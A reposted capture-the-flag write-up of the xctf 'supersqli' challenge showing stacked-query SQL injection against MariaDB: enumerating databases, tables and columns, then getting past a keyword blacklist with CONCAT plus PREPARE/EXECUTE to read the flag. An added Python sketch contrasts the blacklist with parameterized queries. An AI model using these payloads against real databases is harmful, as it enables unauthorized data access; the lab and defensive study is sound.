0223xctf-supersqli

Attempt

1' or 1=2

Error: error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1

Read the databases

1';show databases;#

Result:

array(1) {
  [0]=>
  string(11) "ctftraining"
}
array(1) {
  [0]=>
  string(18) "information_schema"
}
array(1) {
  [0]=>
  string(5) "mysql"
}
array(1) {
  [0]=>
  string(18) "performance_schema"
}
array(1) {
  [0]=>
  string(9) "supersqli"
}
array(1) {
  [0]=>
  string(4) "test"
}

Select the database and list its tables

1';use supersqli;
1';show tables;

Result:

array(1) {
  [0]=>
  string(16) "1919810931114514"
}

array(1) {
  [0]=>
  string(5) "words"
}

List the columns

1';show columns from `1919810931114514`;

Result:

array(6) {
  [0]=>
  string(4) "flag"
  [1]=>
  string(12) "varchar(100)"
  [2]=>
  string(2) "NO"
  [3]=>
  string(0) ""
  [4]=>
  NULL
  [5]=>
  string(0) ""
}

1' ; select flag from 1919810931114514;

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

Disabled functions: the filter above rejects these keywords.

Rename bypass (using the alter and rename statements)

Stored-procedure bypass (using the prepare statement); string concatenation gets past the select filter:

1'; set @a = CONCAT('se','lect * from `1919810931114514`;'); prepare flag from @a; EXECUTE flag;
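
The following Python sketch is an added example, not code from the original post: it ports the blacklist quoted above from PHP's preg_match to Python, runs it over the inputs from this walkthrough, and contrasts it with an allowlisted id bound as a query parameter. The SQLite stand-in table, its columns `id` and `data`, its sample rows and all function names are assumptions for illustration.

```python
import re
import sqlite3

# Blacklist quoted on the page, ported from PHP preg_match to Python's re.
BLACKLIST = re.compile(r"select|update|delete|drop|insert|where|\.", re.I)

# Inputs copied from the walkthrough on this page.
PAGE_INPUTS = {
    "direct select": "1' ; select flag from 1919810931114514;",
    "show databases": "1';show databases;#",
    "show tables": "1';show tables;",
    "concat + prepare": "1'; set @a = CONCAT('se','lect * from `1919810931114514`;'); "
                        "prepare flag from @a; EXECUTE flag;",
}

def blacklist_blocks(inject: str) -> bool:
    """True when the page's keyword filter would reject the input."""
    return BLACKLIST.search(inject) is not None

def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the `words` table (SQLite; columns are assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE words (id INTEGER, data TEXT)")
    db.executemany("INSERT INTO words VALUES (?, ?)", [(1, "sample-a"), (2, "sample-b")])
    return db

def lookup_hardened(db: sqlite3.Connection, inject: str) -> list:
    """Allowlist the id as decimal digits, then bind it as a parameter.
    The SQL text is constant, so input can never add a second statement."""
    if not re.fullmatch(r"[0-9]{1,10}", inject):
        raise ValueError("id must be a decimal integer")
    return db.execute("SELECT id, data FROM words WHERE id = ?", (int(inject),)).fetchall()

def audit() -> dict:
    """Map each page input to (blocked by blacklist?, hardened lookup outcome)."""
    db, report = make_db(), {}
    for name, payload in PAGE_INPUTS.items():
        try:
            lookup_hardened(db, payload)
            outcome = "accepted"
        except ValueError:
            outcome = "rejected"
        report[name] = (blacklist_blocks(payload), outcome)
    return report

if __name__ == "__main__":
    for name, (blocked, outcome) in audit().items():
        print(f"{name:18} blacklist_blocked={blocked!s:5} hardened={outcome}")
```

Only the direct select trips the blacklist, while the allowlist rejects every input from the walkthrough and still serves a plain numeric id.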

Reference: https://www.jianshu.com/p/fd7812d75a98


Reposted from blog.csdn.net/qq_39543838/article/details/114004377